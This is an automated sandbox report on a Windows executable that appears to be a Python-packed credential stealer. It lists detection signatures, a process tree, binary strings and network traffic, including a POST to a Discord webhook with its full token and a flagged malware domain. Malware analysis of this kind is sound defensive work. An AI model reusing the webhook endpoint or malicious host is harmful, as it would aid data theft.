Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAP46E1UkZ.exe

Overview

General Information

Sample Name:PAP46E1UkZ.exe
Analysis ID:881081
MD5:0a6e31e8d7a0989f682b7ad92d489eb4
SHA1:04c0807d48680d66d84574413da9e85c2e3822aa
SHA256:e4e4cb8e87b66d2846563f0194da78c9e684cbf5deffd660525efcf0fd54a276
Tags:exe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Hides threads from debuggers
Contains functionality to infect the boot sector
May check the online IP address of the machine
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
PE file contains more sections than normal
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • PAP46E1UkZ.exe (PID: 7092 cmdline: C:\Users\user\Desktop\PAP46E1UkZ.exe MD5: 0A6E31E8D7A0989F682B7AD92D489EB4)
    • PAP46E1UkZ.exe (PID: 4020 cmdline: C:\Users\user\Desktop\PAP46E1UkZ.exe MD5: 0A6E31E8D7A0989F682B7AD92D489EB4)
      • cmd.exe (PID: 5752 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: PAP46E1UkZ.exeVirustotal: Detection: 7%Perma Link
Antivirus detection for URL or domain
Source: https://superfurrycdn.nl/copy/Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A37600 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,clock,clock,clock,clock,CryptReleaseContext,1_2_70A37600
Source: PAP46E1UkZ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370230553.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370444387.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368702004.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, _overlapped.pyd.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369111351.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368523087.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369855733.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370146089.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370496162.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366840408.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367469631.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368913569.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369950391.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369632521.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370097645.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368572076.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369309676.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368414134.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368624931.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\pywintypes.pdb source: pywintypes39.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370046126.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368017381.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366897365.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369438124.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370576743.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368861535.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: PAP46E1UkZ.exe, 00000000.00000003.367469631.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_uuid.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\win32trace.pdb source: PAP46E1UkZ.exe, 00000000.00000003.375172920.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369675992.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367556854.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\_win32sysloader.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368384708.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368366043.00000293619BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369261447.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368462502.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370000416.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\pywintypes.pdb( source: pywintypes39.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369063487.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370270548.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369369683.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369179240.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370372039.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370625908.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369502609.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369902126.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369546989.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368750124.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370409288.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369017279.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368965422.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370189096.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370541114.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C55D50 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF735C55D50
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C55D50 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF735C55D50
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C5FF28 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF735C5FF28
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 4x nop then push rbp1_2_70A2B250
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 4x nop then push rbp1_2_70A2B250

Networking

barindex
May check the online IP address of the machine
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDNS query: name: api.ipify.org
Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox ViewIP Address: 51.178.66.33 51.178.66.33
Source: global trafficHTTP traffic detected: POST /api/webhooks/1095074431224791041/jQaZ4hKGjbnKUzyIOTiqr_bj9R4GOqqnGusOIWEt9Md6puBiIfxAHgdsq2aAU_BYlXjW HTTP/1.1Accept-Encoding: identityContent-Length: 429Host: ptb.discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: PAP46E1UkZ.exe, 00000001.00000003.442824159.000001C631160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: PAP46E1UkZ.exe, 00000001.00000003.428905312.000001C630BC8000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.430886412.000001C6300E4000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.437785732.000001C6314E3000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.452651635.000001C630DD8000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.444454235.000001C630DD6000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440035892.000001C6300E6000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441207210.000001C62E077000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.439518881.000001C630DB8000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.430369293.000001C631491000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440605312.000001C631513000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.451582435.000001C630BC8000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.423787232.000001C631491000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440637098.000001C6300ED000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440200699.000001C630DCF000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440755137.000001C630DD2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441222746.000001C63152B000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.430273665.000001C6300D8000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441304721.000001C630DD3000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441573283.000001C630DD5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.437042623.000001C631493000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.431357624.000001C630BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: PAP46E1UkZ.exe, 00000001.00000003.444633689.000001C630B16000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.433259736.000001C630B0E000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441362641.000001C630B15000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.453391514.000001C6312E0000.00000004.00001000.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.451222683.000001C630B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue23606)
Source: PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374263444.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366897365.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368192738.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367556854.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.372216344.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373497022.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367159889.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373195992.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619BC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368120182.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619C2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367254668.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619BE000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
Source: PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374263444.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366897365.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368192738.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367556854.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.372216344.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373497022.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367159889.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373195992.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368120182.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619C2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367254668.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619BE000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374263444.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366897365.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368192738.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367556854.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.372216344.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373497022.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367159889.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.373195992.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619BC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368120182.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.367254668.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.371676107.00000293619BE000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619C2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIh
Source: PAP46E1UkZ.exe, 00000001.00000002.453391514.000001C6312E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
